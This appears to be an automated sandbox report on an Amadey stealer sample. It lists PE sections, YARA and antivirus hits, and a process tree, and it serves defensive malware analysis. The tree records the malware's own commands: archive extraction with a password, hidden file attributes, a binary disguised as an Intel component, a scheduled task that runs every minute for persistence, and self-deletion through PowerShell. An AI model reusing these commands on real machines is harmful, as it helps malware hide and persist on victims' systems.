                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [ecx], al
                                                                                                                                                                                                                                                add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                adc byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                or ecx, dword ptr [edx]
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3212040x10tddfmghq
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x3211b40x18tddfmghq
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                0x10000x680000x2de00a855eb9bd722d6ab63c99d8d3e495c57False0.9982171747275205data7.9825535221264685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .rsrc0x690000x5d40x40080286adc7a35e412b64ca61ad95ddc10False0.7060546875data5.82538346241216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                tddfmghq0x6b0000x2b70000x2b6800be008f92acc7948aa1e9757b4e699563unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                zxizpfjk0x3220000x10000x40097a985ebfe75e2117b8c65dac92dfdfaFalse0.7724609375data6.056222168544577IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .taggant0x3230000x30000x220092841a4f36a77fc443aa0ef82f794a56False0.04354319852941176DOS executable (COM)0.43462386318593277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_MANIFEST0x3212140x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                                RT_MANIFEST0x3215f80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                kernel32.dlllstrcpy
                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                EnglishUnited States
                                                                                                                                                                                                                                                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:13:12:06
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                Imagebase:0xb20000
                                                                                                                                                                                                                                                File size:3'047'936 bytes
                                                                                                                                                                                                                                                MD5 hash:99A7A8AB2463DD70F90E0AB4E0AEC4A8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2221672468.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:13:12:10
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                Imagebase:0xf30000
                                                                                                                                                                                                                                                File size:3'047'936 bytes
                                                                                                                                                                                                                                                MD5 hash:99A7A8AB2463DD70F90E0AB4E0AEC4A8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2262477071.0000000004960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:13:12:11
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Imagebase:0xf30000
                                                                                                                                                                                                                                                File size:3'047'936 bytes
                                                                                                                                                                                                                                                MD5 hash:99A7A8AB2463DD70F90E0AB4E0AEC4A8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.2272594198.0000000005390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:13:13:00
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                Imagebase:0xf30000
                                                                                                                                                                                                                                                File size:3'047'936 bytes
                                                                                                                                                                                                                                                MD5 hash:99A7A8AB2463DD70F90E0AB4E0AEC4A8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000003.2755017599.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:13:13:17
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:4'438'776 bytes
                                                                                                                                                                                                                                                MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                Start time:13:13:21
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                Imagebase:0x7ff6a01e0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                Start time:13:13:22
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                Start time:13:13:22
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:mode 65,10
                                                                                                                                                                                                                                                Imagebase:0x7ff78e670000
                                                                                                                                                                                                                                                File size:33'280 bytes
                                                                                                                                                                                                                                                MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:13:13:22
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:13:13:22
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                Start time:13:13:22
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                Start time:13:13:23
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                Start time:13:13:23
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                Start time:13:13:23
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                                Start time:13:13:23
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                Start time:13:13:24
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                Start time:13:13:24
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:attrib +H "in.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff64d350000
                                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                Start time:13:13:24
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"in.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff6d4210000
                                                                                                                                                                                                                                                File size:1'827'328 bytes
                                                                                                                                                                                                                                                MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                Start time:13:13:24
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff64d350000
                                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff64d350000
                                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                                                                Imagebase:0x7ff62d990000
                                                                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                                Start time:13:13:25
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                                Start time:13:13:26
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                                                                Imagebase:0x7ff72c040000
                                                                                                                                                                                                                                                File size:22'528 bytes
                                                                                                                                                                                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                                Start time:13:13:27
                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff7fc490000
                                                                                                                                                                                                                                                File size:1'827'328 bytes
                                                                                                                                                                                                                                                MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
